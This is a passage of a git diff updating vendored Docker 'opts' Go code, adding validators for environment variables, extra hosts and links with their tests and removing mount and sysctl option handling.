+// +// The only validation here is to check if name is empty, per #25099 +func ValidateEnv(val string) (string, error) { + arr := strings.Split(val, "=") + if arr[0] == "" { + return "", errors.Errorf("invalid environment variable: %s", val) + } + if len(arr) > 1 { + return val, nil + } + if !doesEnvExist(val) { + return val, nil + } + return fmt.Sprintf("%s=%s", val, os.Getenv(val)), nil +} + +func doesEnvExist(name string) bool { + for _, entry := range os.Environ() { + parts := strings.SplitN(entry, "=", 2) + if runtime.GOOS == "windows" { + // Environment variable are case-insensitive on Windows. PaTh, path and PATH are equivalent. + if strings.EqualFold(parts[0], name) { + return true + } + } + if parts[0] == name { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/opts/env_test.go b/vendor/github.com/docker/docker/opts/env_test.go new file mode 100644 index 0000000000..1ecf1e2b94 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/env_test.go @@ -0,0 +1,124 @@ +package opts // import "github.com/docker/docker/opts" + +import ( + "fmt" + "os" + "runtime" + "testing" +) + +func TestValidateEnv(t *testing.T) { + testcase := []struct { + value string + expected string + err error + }{ + { + value: "a", + expected: "a", + }, + { + value: "something", + expected: "something", + }, + { + value: "_=a", + expected: "_=a", + }, + { + value: "env1=value1", + expected: "env1=value1", + }, + { + value: "_env1=value1", + expected: "_env1=value1", + }, + { + value: "env2=value2=value3", + expected: "env2=value2=value3", + }, + { + value: "env3=abc!qwe", + expected: "env3=abc!qwe", + }, + { + value: "env_4=value 4", + expected: "env_4=value 4", + }, + { + value: "PATH", + expected: fmt.Sprintf("PATH=%v", os.Getenv("PATH")), + }, + { + value: "=a", + err: fmt.Errorf(fmt.Sprintf("invalid environment variable: %s", "=a")), + }, + { + value: "PATH=something", + expected: "PATH=something", + }, + { + value: "asd!qwe", + expected: 
"asd!qwe", + }, + { + value: "1asd", + expected: "1asd", + }, + { + value: "123", + expected: "123", + }, + { + value: "some space", + expected: "some space", + }, + { + value: " some space before", + expected: " some space before", + }, + { + value: "some space after ", + expected: "some space after ", + }, + { + value: "=", + err: fmt.Errorf(fmt.Sprintf("invalid environment variable: %s", "=")), + }, + } + + // Environment variables are case in-sensitive on Windows + if runtime.GOOS == "windows" { + tmp := struct { + value string + expected string + err error + }{ + value: "PaTh", + expected: fmt.Sprintf("PaTh=%v", os.Getenv("PATH")), + } + testcase = append(testcase, tmp) + + } + + for _, r := range testcase { + actual, err := ValidateEnv(r.value) + + if err != nil { + if r.err == nil { + t.Fatalf("Expected err is nil, got err[%v]", err) + } + if err.Error() != r.err.Error() { + t.Fatalf("Expected err[%v], got err[%v]", r.err, err) + } + } + + if err == nil && r.err != nil { + t.Fatalf("Expected err[%v], but err is nil", r.err) + } + + if actual != r.expected { + t.Fatalf("Expected [%v], got [%v]", r.expected, actual) + } + } +} diff --git a/vendor/github.com/docker/docker/opts/hosts.go b/vendor/github.com/docker/docker/opts/hosts.go index 266df1e537..2adf4211d5 100644 --- a/vendor/github.com/docker/docker/opts/hosts.go +++ b/vendor/github.com/docker/docker/opts/hosts.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" @@ -9,7 +9,7 @@ import ( ) var ( - // DefaultHTTPPort Default HTTP Port used if only the protocol is provided to -H flag e.g. docker daemon -H tcp:// + // DefaultHTTPPort Default HTTP Port used if only the protocol is provided to -H flag e.g. 
dockerd -H tcp:// // These are the IANA registered port numbers for use with Docker // see http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=docker DefaultHTTPPort = 2375 // Default HTTP Port @@ -29,15 +29,15 @@ var ( // ValidateHost validates that the specified string is a valid host and returns it. func ValidateHost(val string) (string, error) { host := strings.TrimSpace(val) - // The empty string means default and is not handled by parseDockerDaemonHost + // The empty string means default and is not handled by parseDaemonHost if host != "" { - _, err := parseDockerDaemonHost(host) + _, err := parseDaemonHost(host) if err != nil { return val, err } } // Note: unlike most flag validators, we don't return the mutated value here - // we need to know what the user entered later (using ParseHost) to adjust for tls + // we need to know what the user entered later (using ParseHost) to adjust for TLS return val, nil } @@ -52,7 +52,7 @@ func ParseHost(defaultToTLS bool, val string) (string, error) { } } else { var err error - host, err = parseDockerDaemonHost(host) + host, err = parseDaemonHost(host) if err != nil { return val, err } @@ -60,9 +60,9 @@ func ParseHost(defaultToTLS bool, val string) (string, error) { return host, nil } -// parseDockerDaemonHost parses the specified address and returns an address that will be used as the host. +// parseDaemonHost parses the specified address and returns an address that will be used as the host. // Depending of the address specified, this may return one of the global Default* strings defined in hosts.go. 
-func parseDockerDaemonHost(addr string) (string, error) { +func parseDaemonHost(addr string) (string, error) { addrParts := strings.SplitN(addr, "://", 2) if len(addrParts) == 1 && addrParts[0] != "" { addrParts = []string{"tcp", addrParts[0]} @@ -149,3 +149,17 @@ func ParseTCPAddr(tryAddr string, defaultAddr string) (string, error) { return fmt.Sprintf("tcp://%s%s", net.JoinHostPort(host, port), u.Path), nil } + +// ValidateExtraHost validates that the specified string is a valid extrahost and returns it. +// ExtraHost is in the form of name:ip where the ip has to be a valid ip (IPv4 or IPv6). +func ValidateExtraHost(val string) (string, error) { + // allow for IPv6 addresses in extra hosts by only splitting on first ":" + arr := strings.SplitN(val, ":", 2) + if len(arr) != 2 || len(arr[0]) == 0 { + return "", fmt.Errorf("bad format for add-host: %q", val) + } + if _, err := ValidateIPAddress(arr[1]); err != nil { + return "", fmt.Errorf("invalid IP address in add-host: %q", arr[1]) + } + return val, nil +} diff --git a/vendor/github.com/docker/docker/opts/hosts_test.go b/vendor/github.com/docker/docker/opts/hosts_test.go index a5bec30d4c..cd8c3f91f2 100644 --- a/vendor/github.com/docker/docker/opts/hosts_test.go +++ b/vendor/github.com/docker/docker/opts/hosts_test.go @@ -1,7 +1,8 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" + "strings" "testing" ) @@ -82,12 +83,12 @@ func TestParseDockerDaemonHost(t *testing.T) { "localhost:5555/path": "tcp://localhost:5555/path", } for invalidAddr, expectedError := range invalids { - if addr, err := parseDockerDaemonHost(invalidAddr); err == nil || err.Error() != expectedError { + if addr, err := parseDaemonHost(invalidAddr); err == nil || err.Error() != expectedError { t.Errorf("tcp %v address expected error %q return, got %q and addr %v", invalidAddr, expectedError, err, addr) } } for validAddr, expectedAddr := range valids { - if addr, err := parseDockerDaemonHost(validAddr); err 
!= nil || addr != expectedAddr { + if addr, err := parseDaemonHost(validAddr); err != nil || addr != expectedAddr { t.Errorf("%v -> expected %v, got (%v) addr (%v)", validAddr, expectedAddr, err, addr) } } @@ -146,3 +147,35 @@ func TestParseInvalidUnixAddrInvalid(t *testing.T) { t.Fatalf("Expected an %v, got %v", v, "unix:///var/run/docker.sock") } } + +func TestValidateExtraHosts(t *testing.T) { + valid := []string{ + `myhost:192.168.0.1`, + `thathost:10.0.2.1`, + `anipv6host:2003:ab34:e::1`, + `ipv6local:::1`, + } + + invalid := map[string]string{ + `myhost:192.notanipaddress.1`: `invalid IP`, + `thathost-nosemicolon10.0.0.1`: `bad format`, + `anipv6host:::::1`: `invalid IP`, + `ipv6local:::0::`: `invalid IP`, + } + + for _, extrahost := range valid { + if _, err := ValidateExtraHost(extrahost); err != nil { + t.Fatalf("ValidateExtraHost(`"+extrahost+"`) should succeed: error %v", err) + } + } + + for extraHost, expectedError := range invalid { + if _, err := ValidateExtraHost(extraHost); err == nil { + t.Fatalf("ValidateExtraHost(`%q`) should have failed validation", extraHost) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("ValidateExtraHost(`%q`) error should contain %q", extraHost, expectedError) + } + } + } +} diff --git a/vendor/github.com/docker/docker/opts/hosts_unix.go b/vendor/github.com/docker/docker/opts/hosts_unix.go index 611407a9d9..9d5bb64565 100644 --- a/vendor/github.com/docker/docker/opts/hosts_unix.go +++ b/vendor/github.com/docker/docker/opts/hosts_unix.go @@ -1,6 +1,6 @@ // +build !windows -package opts +package opts // import "github.com/docker/docker/opts" import "fmt" diff --git a/vendor/github.com/docker/docker/opts/hosts_windows.go b/vendor/github.com/docker/docker/opts/hosts_windows.go index 7c239e00f1..906eba53ee 100644 --- a/vendor/github.com/docker/docker/opts/hosts_windows.go +++ b/vendor/github.com/docker/docker/opts/hosts_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package opts +package opts // 
import "github.com/docker/docker/opts" // DefaultHost constant defines the default host string used by docker on Windows var DefaultHost = "npipe://" + DefaultNamedPipe diff --git a/vendor/github.com/docker/docker/opts/ip.go b/vendor/github.com/docker/docker/opts/ip.go index fb03b50111..cfbff3a9fd 100644 --- a/vendor/github.com/docker/docker/opts/ip.go +++ b/vendor/github.com/docker/docker/opts/ip.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" @@ -22,7 +22,7 @@ func NewIPOpt(ref *net.IP, defaultVal string) *IPOpt { } // Set sets an IPv4 or IPv6 address from a given string. If the given -// string is not parseable as an IP address it returns an error. +// string is not parsable as an IP address it returns an error. func (o *IPOpt) Set(val string) error { ip := net.ParseIP(val) if ip == nil { diff --git a/vendor/github.com/docker/docker/opts/ip_test.go b/vendor/github.com/docker/docker/opts/ip_test.go index 1027d84a05..966d7f21ec 100644 --- a/vendor/github.com/docker/docker/opts/ip_test.go +++ b/vendor/github.com/docker/docker/opts/ip_test.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "net" diff --git a/vendor/github.com/docker/docker/opts/mount.go b/vendor/github.com/docker/docker/opts/mount.go deleted file mode 100644 index ce6383ddca..0000000000 --- a/vendor/github.com/docker/docker/opts/mount.go +++ /dev/null @@ -1,171 +0,0 @@ -package opts - -import ( - "encoding/csv" - "fmt" - "os" - "strconv" - "strings" - - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/go-units" -) - -// MountOpt is a Value type for parsing mounts -type MountOpt struct { - values []mounttypes.Mount -} - -// Set a new mount value -func (m *MountOpt) Set(value string) error { - csvReader := csv.NewReader(strings.NewReader(value)) - fields, err := csvReader.Read() - if err != nil { - return err - } - - mount := mounttypes.Mount{} - - volumeOptions := func() 
*mounttypes.VolumeOptions { - if mount.VolumeOptions == nil { - mount.VolumeOptions = &mounttypes.VolumeOptions{ - Labels: make(map[string]string), - } - } - if mount.VolumeOptions.DriverConfig == nil { - mount.VolumeOptions.DriverConfig = &mounttypes.Driver{} - } - return mount.VolumeOptions - } - - bindOptions := func() *mounttypes.BindOptions { - if mount.BindOptions == nil { - mount.BindOptions = new(mounttypes.BindOptions) - } - return mount.BindOptions - } - - tmpfsOptions := func() *mounttypes.TmpfsOptions { - if mount.TmpfsOptions == nil { - mount.TmpfsOptions = new(mounttypes.TmpfsOptions) - } - return mount.TmpfsOptions - } - - setValueOnMap := func(target map[string]string, value string) { - parts := strings.SplitN(value, "=", 2) - if len(parts) == 1 { - target[value] = "" - } else { - target[parts[0]] = parts[1] - } - } - - mount.Type = mounttypes.TypeVolume // default to volume mounts - // Set writable as the default - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - key := strings.ToLower(parts[0]) - - if len(parts) == 1 { - switch key { - case "readonly", "ro": - mount.ReadOnly = true - continue - case "volume-nocopy": - volumeOptions().NoCopy = true - continue - } - } - - if len(parts) != 2 { - return fmt.Errorf("invalid field '%s' must be a key=value pair", field) - } - - value := parts[1] - switch key { - case "type": - mount.Type = mounttypes.Type(strings.ToLower(value)) - case "source", "src": - mount.Source = value - case "target", "dst", "destination": - mount.Target = value - case "readonly", "ro": - mount.ReadOnly, err = strconv.ParseBool(value) - if err != nil { - return fmt.Errorf("invalid value for %s: %s", key, value) - } - case "bind-propagation": - bindOptions().Propagation = mounttypes.Propagation(strings.ToLower(value)) - case "volume-nocopy": - volumeOptions().NoCopy, err = strconv.ParseBool(value) - if err != nil { - return fmt.Errorf("invalid value for populate: %s", value) - } - case "volume-label": - 
setValueOnMap(volumeOptions().Labels, value) - case "volume-driver": - volumeOptions().DriverConfig.Name = value - case "volume-opt": - if volumeOptions().DriverConfig.Options == nil { - volumeOptions().DriverConfig.Options = make(map[string]string) - } - setValueOnMap(volumeOptions().DriverConfig.Options, value) - case "tmpfs-size": - sizeBytes, err := units.RAMInBytes(value) - if err != nil { - return fmt.Errorf("invalid value for %s: %s", key, value) - } - tmpfsOptions().SizeBytes = sizeBytes - case "tmpfs-mode": - ui64, err := strconv.ParseUint(value, 8, 32) - if err != nil { - return fmt.Errorf("invalid value for %s: %s", key, value) - } - tmpfsOptions().Mode = os.FileMode(ui64) - default: - return fmt.Errorf("unexpected key '%s' in '%s'", key, field) - } - } - - if mount.Type == "" { - return fmt.Errorf("type is required") - } - - if mount.Target == "" { - return fmt.Errorf("target is required") - } - - if mount.VolumeOptions != nil && mount.Type != mounttypes.TypeVolume { - return fmt.Errorf("cannot mix 'volume-*' options with mount type '%s'", mount.Type) - } - if mount.BindOptions != nil && mount.Type != mounttypes.TypeBind { - return fmt.Errorf("cannot mix 'bind-*' options with mount type '%s'", mount.Type) - } - if mount.TmpfsOptions != nil && mount.Type != mounttypes.TypeTmpfs { - return fmt.Errorf("cannot mix 'tmpfs-*' options with mount type '%s'", mount.Type) - } - - m.values = append(m.values, mount) - return nil -} - -// Type returns the type of this option -func (m *MountOpt) Type() string { - return "mount" -} - -// String returns a string repr of this option -func (m *MountOpt) String() string { - mounts := []string{} - for _, mount := range m.values { - repr := fmt.Sprintf("%s %s %s", mount.Type, mount.Source, mount.Target) - mounts = append(mounts, repr) - } - return strings.Join(mounts, ", ") -} - -// Value returns the mounts -func (m *MountOpt) Value() []mounttypes.Mount { - return m.values -} diff --git 
a/vendor/github.com/docker/docker/opts/mount_test.go b/vendor/github.com/docker/docker/opts/mount_test.go deleted file mode 100644 index 59606c38e2..0000000000 --- a/vendor/github.com/docker/docker/opts/mount_test.go +++ /dev/null @@ -1,184 +0,0 @@ -package opts - -import ( - "os" - "testing" - - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestMountOptString(t *testing.T) { - mount := MountOpt{ - values: []mounttypes.Mount{ - { - Type: mounttypes.TypeBind, - Source: "/home/path", - Target: "/target", - }, - { - Type: mounttypes.TypeVolume, - Source: "foo", - Target: "/target/foo", - }, - }, - } - expected := "bind /home/path /target, volume foo /target/foo" - assert.Equal(t, mount.String(), expected) -} - -func TestMountOptSetBindNoErrorBind(t *testing.T) { - for _, testcase := range []string{ - // tests several aliases that should have same result. - "type=bind,target=/target,source=/source", - "type=bind,src=/source,dst=/target", - "type=bind,source=/source,dst=/target", - "type=bind,src=/source,target=/target", - } { - var mount MountOpt - - assert.NilError(t, mount.Set(testcase)) - - mounts := mount.Value() - assert.Equal(t, len(mounts), 1) - assert.Equal(t, mounts[0], mounttypes.Mount{ - Type: mounttypes.TypeBind, - Source: "/source", - Target: "/target", - }) - } -} - -func TestMountOptSetVolumeNoError(t *testing.T) { - for _, testcase := range []string{ - // tests several aliases that should have same result. 
- "type=volume,target=/target,source=/source", - "type=volume,src=/source,dst=/target", - "type=volume,source=/source,dst=/target", - "type=volume,src=/source,target=/target", - } { - var mount MountOpt - - assert.NilError(t, mount.Set(testcase)) - - mounts := mount.Value() - assert.Equal(t, len(mounts), 1) - assert.Equal(t, mounts[0], mounttypes.Mount{ - Type: mounttypes.TypeVolume, - Source: "/source", - Target: "/target", - }) - } -} - -// TestMountOptDefaultType ensures that a mount without the type defaults to a -// volume mount. -func TestMountOptDefaultType(t *testing.T) { - var mount MountOpt - assert.NilError(t, mount.Set("target=/target,source=/foo")) - assert.Equal(t, mount.values[0].Type, mounttypes.TypeVolume) -} - -func TestMountOptSetErrorNoTarget(t *testing.T) { - var mount MountOpt - assert.Error(t, mount.Set("type=volume,source=/foo"), "target is required") -} - -func TestMountOptSetErrorInvalidKey(t *testing.T) { - var mount MountOpt - assert.Error(t, mount.Set("type=volume,bogus=foo"), "unexpected key 'bogus'") -} - -func TestMountOptSetErrorInvalidField(t *testing.T) { - var mount MountOpt - assert.Error(t, mount.Set("type=volume,bogus"), "invalid field 'bogus'") -} - -func TestMountOptSetErrorInvalidReadOnly(t *testing.T) { - var mount MountOpt - assert.Error(t, mount.Set("type=volume,readonly=no"), "invalid value for readonly: no") - assert.Error(t, mount.Set("type=volume,readonly=invalid"), "invalid value for readonly: invalid") -} - -func TestMountOptDefaultEnableReadOnly(t *testing.T) { - var m MountOpt - assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo")) - assert.Equal(t, m.values[0].ReadOnly, false) - - m = MountOpt{} - assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly")) - assert.Equal(t, m.values[0].ReadOnly, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=1")) - assert.Equal(t, m.values[0].ReadOnly, true) - - m = MountOpt{} - assert.NilError(t, 
m.Set("type=bind,target=/foo,source=/foo,readonly=true")) - assert.Equal(t, m.values[0].ReadOnly, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=0")) - assert.Equal(t, m.values[0].ReadOnly, false) -} - -func TestMountOptVolumeNoCopy(t *testing.T) { - var m MountOpt - assert.NilError(t, m.Set("type=volume,target=/foo,volume-nocopy")) - assert.Equal(t, m.values[0].Source, "") - - m = MountOpt{} - assert.NilError(t, m.Set("type=volume,target=/foo,source=foo")) - assert.Equal(t, m.values[0].VolumeOptions == nil, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=true")) - assert.Equal(t, m.values[0].VolumeOptions != nil, true) - assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy")) - assert.Equal(t, m.values[0].VolumeOptions != nil, true) - assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=1")) - assert.Equal(t, m.values[0].VolumeOptions != nil, true) - assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) -} - -func TestMountOptTypeConflict(t *testing.T) { - var m MountOpt - assert.Error(t, m.Set("type=bind,target=/foo,source=/foo,volume-nocopy=true"), "cannot mix") - assert.Error(t, m.Set("type=volume,target=/foo,source=/foo,bind-propagation=rprivate"), "cannot mix") -} - -func TestMountOptSetTmpfsNoError(t *testing.T) { - for _, testcase := range []string{ - // tests several aliases that should have same result. 
- "type=tmpfs,target=/target,tmpfs-size=1m,tmpfs-mode=0700", - "type=tmpfs,target=/target,tmpfs-size=1MB,tmpfs-mode=700", - } { - var mount MountOpt - - assert.NilError(t, mount.Set(testcase)) - - mounts := mount.Value() - assert.Equal(t, len(mounts), 1) - assert.DeepEqual(t, mounts[0], mounttypes.Mount{ - Type: mounttypes.TypeTmpfs, - Target: "/target", - TmpfsOptions: &mounttypes.TmpfsOptions{ - SizeBytes: 1024 * 1024, // not 1000 * 1000 - Mode: os.FileMode(0700), - }, - }) - } -} - -func TestMountOptSetTmpfsError(t *testing.T) { - var m MountOpt - assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-size=foo"), "invalid value for tmpfs-size") - assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-mode=foo"), "invalid value for tmpfs-mode") - assert.Error(t, m.Set("type=tmpfs"), "target is required") -} diff --git a/vendor/github.com/docker/docker/opts/opts.go b/vendor/github.com/docker/docker/opts/opts.go index ae851537ec..de8aacb806 100644 --- a/vendor/github.com/docker/docker/opts/opts.go +++ b/vendor/github.com/docker/docker/opts/opts.go @@ -1,13 +1,13 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" - "math/big" "net" + "path" "regexp" "strings" - "github.com/docker/docker/api/types/filters" + "github.com/docker/go-units" ) var ( @@ -36,7 +36,10 @@ func NewListOptsRef(values *[]string, validator ValidatorFctType) *ListOpts { } func (opts *ListOpts) String() string { - return fmt.Sprintf("%v", []string((*opts.values))) + if len(*opts.values) == 0 { + return "" + } + return fmt.Sprintf("%v", *opts.values) } // Set validates if needed the input value and adds it to the @@ -49,7 +52,7 @@ func (opts *ListOpts) Set(value string) error { } value = v } - (*opts.values) = append((*opts.values), value) + *opts.values = append(*opts.values, value) return nil } @@ -57,7 +60,7 @@ func (opts *ListOpts) Set(value string) error { func (opts *ListOpts) Delete(key string) { for i, k := range *opts.values { if k == key { - (*opts.values) = 
append((*opts.values)[:i], (*opts.values)[i+1:]...) + *opts.values = append((*opts.values)[:i], (*opts.values)[i+1:]...) return } } @@ -75,7 +78,7 @@ func (opts *ListOpts) GetMap() map[string]struct{} { // GetAll returns the values of slice. func (opts *ListOpts) GetAll() []string { - return (*opts.values) + return *opts.values } // GetAllOrEmpty returns the values of the slice @@ -100,7 +103,7 @@ func (opts *ListOpts) Get(key string) bool { // Len returns the amount of element in the slice. func (opts *ListOpts) Len() int { - return len((*opts.values)) + return len(*opts.values) } // Type returns a string name for this Option type @@ -108,6 +111,12 @@ func (opts *ListOpts) Type() string { return "list" } +// WithValidator returns the ListOpts with validator set. +func (opts *ListOpts) WithValidator(validator ValidatorFctType) *ListOpts { + opts.validator = validator + return opts +} + // NamedOption is an interface that list and map options // with names implement. type NamedOption interface { @@ -168,7 +177,7 @@ func (opts *MapOpts) GetAll() map[string]string { } func (opts *MapOpts) String() string { - return fmt.Sprintf("%v", map[string]string((opts.values))) + return fmt.Sprintf("%v", opts.values) } // Type returns a string name for this Option type @@ -254,107 +263,75 @@ func ValidateLabel(val string) (string, error) { return val, nil } -// ValidateSysctl validates a sysctl and returns it. -func ValidateSysctl(val string) (string, error) { - validSysctlMap := map[string]bool{ - "kernel.msgmax": true, - "kernel.msgmnb": true, - "kernel.msgmni": true, - "kernel.sem": true, - "kernel.shmall": true, - "kernel.shmmax": true, - "kernel.shmmni": true, - "kernel.shm_rmid_forced": true, +// ValidateSingleGenericResource validates that a single entry in the +// generic resource list is valid. 
+// i.e 'GPU=UID1' is valid however 'GPU:UID1' or 'UID1' isn't +func ValidateSingleGenericResource(val string) (string, error) { + if strings.Count(val, "=") < 1 { + return "", fmt.Errorf("invalid node-generic-resource format `%s` expected `name=value`", val) } - validSysctlPrefixes := []string{ - "net.", - "fs.mqueue.", + return val, nil +} + +// ParseLink parses and validates the specified string as a link format (name:alias) +func ParseLink(val string) (string, string, error) { + if val == "" { + return "", "", fmt.Errorf("empty string specified for links") } - arr := strings.Split(val, "=") - if len(arr) < 2 { - return "", fmt.Errorf("sysctl '%s' is not whitelisted", val) + arr := strings.Split(val, ":") + if len(arr) > 2 { + return "", "", fmt.Errorf("bad format for links: %s", val) } - if validSysctlMap[arr[0]] { - return val, nil + if len(arr) == 1 { + return val, val, nil } - - for _, vp := range validSysctlPrefixes { - if strings.HasPrefix(arr[0], vp) { - return val, nil - } + // This is kept because we can actually get a HostConfig with links + // from an already created container and the format is not `foo:bar` + // but `/foo:/c1/bar` + if strings.HasPrefix(arr[0], "/") { + _, alias := path.Split(arr[1]) + return arr[0][1:], alias, nil } - return "", fmt.Errorf("sysctl '%s' is not whitelisted", val) + return arr[0], arr[1], nil } -// FilterOpt is a flag type for validating filters -type FilterOpt struct { - filter filters.Args -} - -// NewFilterOpt returns a new FilterOpt -func NewFilterOpt() FilterOpt { - return FilterOpt{filter: filters.NewArgs()} -} +// MemBytes is a type for human readable memory bytes (like 128M, 2g, etc) +type MemBytes int64 -func (o *FilterOpt) String() string { - repr, err := filters.ToParam(o.filter) - if err != nil { - return "invalid filters" +// String returns the string format of the human readable memory bytes +func (m *MemBytes) String() string { + // NOTE: In spf13/pflag/flag.go, "0" is considered as "zero value" while "0 
B" is not. + // We return "0" in case value is 0 here so that the default value is hidden. + // (Sometimes "default 0 B" is actually misleading) + if m.Value() != 0 { + return units.BytesSize(float64(m.Value())) } - return repr + return "0" } -// Set sets the value of the opt by parsing the command line value -func (o *FilterOpt) Set(value string) error { - var err error - o.filter, err = filters.ParseFlag(value, o.filter) - return err -} - -// Type returns the option type -func (o *FilterOpt) Type() string { - return "filter" -} - -// Value returns the value of this option -func (o *FilterOpt) Value() filters.Args { - return o.filter -} - -// NanoCPUs is a type for fixed point fractional number. -type NanoCPUs int64 - -// String returns the string format of the number -func (c *NanoCPUs) String() string { - return big.NewRat(c.Value(), 1e9).FloatString(3) -} - -// Set sets the value of the NanoCPU by passing a string -func (c *NanoCPUs) Set(value string) error { - cpus, err := ParseCPUs(value) - *c = NanoCPUs(cpus) +// Set sets the value of the MemBytes by passing a string +func (m *MemBytes) Set(value string) error { + val, err := units.RAMInBytes(value) + *m = MemBytes(val) return err } // Type returns the type -func (c *NanoCPUs) Type() string { - return "decimal" +func (m *MemBytes) Type() string { + return "bytes" } // Value returns the value in int64 -func (c *NanoCPUs) Value() int64 { - return int64(*c) +func (m *MemBytes) Value() int64 { + return int64(*m) } -// ParseCPUs takes a string ratio and returns an integer value of nano cpus -func ParseCPUs(value string) (int64, error) { - cpu, ok := new(big.Rat).SetString(value) - if !ok { - return 0, fmt.Errorf("failed to parse %v as a rational number", value) - } - nano := cpu.Mul(cpu, big.NewRat(1e9, 1)) - if !nano.IsInt() { - return 0, fmt.Errorf("value is too precise") +// UnmarshalJSON is the customized unmarshaler for MemBytes +func (m *MemBytes) UnmarshalJSON(s []byte) error { + if len(s) <= 2 || s[0] != 
'"' || s[len(s)-1] != '"' { + return fmt.Errorf("invalid size: %q", s) } - return nano.Num().Int64(), nil + val, err := units.RAMInBytes(string(s[1 : len(s)-1])) + *m = MemBytes(val) + return err } diff --git a/vendor/github.com/docker/docker/opts/opts_test.go b/vendor/github.com/docker/docker/opts/opts_test.go index 9f41e47864..577395edcb 100644 --- a/vendor/github.com/docker/docker/opts/opts_test.go +++ b/vendor/github.com/docker/docker/opts/opts_test.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" @@ -50,7 +50,7 @@ func TestMapOpts(t *testing.T) { t.Errorf("max-size = %s != 1", tmpMap["max-size"]) } if o.Set("dummy-val=3") == nil { - t.Errorf("validator is not being called") + t.Error("validator is not being called") } } @@ -93,12 +93,12 @@ func TestListOptsWithValidator(t *testing.T) { // Re-using logOptsvalidator (used by MapOpts) o := NewListOpts(logOptsValidator) o.Set("foo") - if o.String() != "[]" { - t.Errorf("%s != []", o.String()) + if o.String() != "" { + t.Errorf(`%s != ""`, o.String()) } o.Set("foo=bar") - if o.String() != "[]" { - t.Errorf("%s != []", o.String()) + if o.String() != "" { + t.Errorf(`%s != ""`, o.String()) } o.Set("max-file=2") if o.Len() != 1 { @@ -111,8 +111,8 @@ func TestListOptsWithValidator(t *testing.T) { t.Error("o.Get(\"baz\") == true") } o.Delete("max-file=2") - if o.String() != "[]" { - t.Errorf("%s != []", o.String()) + if o.String() != "" { + t.Errorf(`%s != ""`, o.String()) } } @@ -157,7 +157,7 @@ func TestValidateDNSSearch(t *testing.T) { `foo.bar-.baz`, `foo.-bar`, `foo.-bar.baz`, - `foo.bar.baz.this.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbe`, + 
`foo.bar.baz.this.should.fail.on.long.name.because.it.is.longer.thanitshouldbethis.should.fail.on.long.name.because.it.is.longer.thanitshouldbethis.should.fail.on.long.name.because.it.is.longer.thanitshouldbethis.should.fail.on.long.name.because.it.is.longer.thanitshouldbe`, } for _, domain := range valid { @@ -230,3 +230,35 @@ func TestNamedMapOpts(t *testing.T) { t.Errorf("expected map-size to be in the values, got %v", tmpMap) } } + +func TestParseLink(t *testing.T) { + name, alias, err := ParseLink("name:alias") + if err != nil { + t.Fatalf("Expected not to error out on a valid name:alias format but got: %v", err) + } + if name != "name" { + t.Fatalf("Link name should have been name, got %s instead", name) + } + if alias != "alias" { + t.Fatalf("Link alias should have been alias, got %s instead", alias) + } + // short format definition + name, alias, err = ParseLink("name") + if err != nil { + t.Fatalf("Expected not to error out on a valid name only format but got: %v", err) + } + if name != "name" { + t.Fatalf("Link name should have been name, got %s instead", name) + } + if alias != "name" { + t.Fatalf("Link alias should have been name, got %s instead", alias) + } + // empty string link definition is not allowed + if _, _, err := ParseLink(""); err == nil || !strings.Contains(err.Error(), "empty string specified for links") { + t.Fatalf("Expected error 'empty string specified for links' but got: %v", err) + } + // more than two colons are not allowed + if _, _, err := ParseLink("link:alias:wrong"); err == nil || !strings.Contains(err.Error(), "bad format for links: link:alias:wrong") { + t.Fatalf("Expected error 'bad format for links: link:alias:wrong' but got: %v", err) + } +} diff --git a/vendor/github.com/docker/docker/opts/opts_unix.go b/vendor/github.com/docker/docker/opts/opts_unix.go index f1ce844a8f..0c32367cb2 100644 --- a/vendor/github.com/docker/docker/opts/opts_unix.go +++ b/vendor/github.com/docker/docker/opts/opts_unix.go @@ -1,6 +1,6 @@ // 
